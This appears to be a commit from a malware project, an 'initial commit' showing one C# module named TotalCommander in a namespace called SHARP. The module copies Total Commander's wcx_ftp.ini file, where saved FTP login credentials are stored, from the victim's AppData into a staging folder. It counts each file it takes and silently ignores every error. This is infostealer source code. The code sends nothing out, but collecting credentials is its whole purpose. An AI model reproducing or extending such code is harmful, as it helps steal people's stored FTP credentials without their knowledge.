initial commit

This commit is contained in:
i2p
2026-08-27 11:22:57 -06:00
commit 3ad3d6e5f4
211 changed files with 105455 additions and 0 deletions
+29
View File
@@ -0,0 +1,29 @@
using System.IO;
using System.Threading.Tasks;
namespace SHARP
{
internal class TotalCommander
{
public static async Task Start(string head)
{
try
{
string path = Help.AppData + "\\GHISLER\\";
if (Directory.Exists(path))
Directory.CreateDirectory(head + "\\FTP\\Total Commander");
foreach (FileSystemInfo file in new DirectoryInfo(path).GetFiles())
{
if (file.Name.Contains("wcx_ftp.ini"))
{
File.Copy(path + "wcx_ftp.ini", head + "\\FTP\\Total Commander\\wcx_ftp.ini");
++Counting.totalcmd;
}
}
}
catch
{
}
}
}
}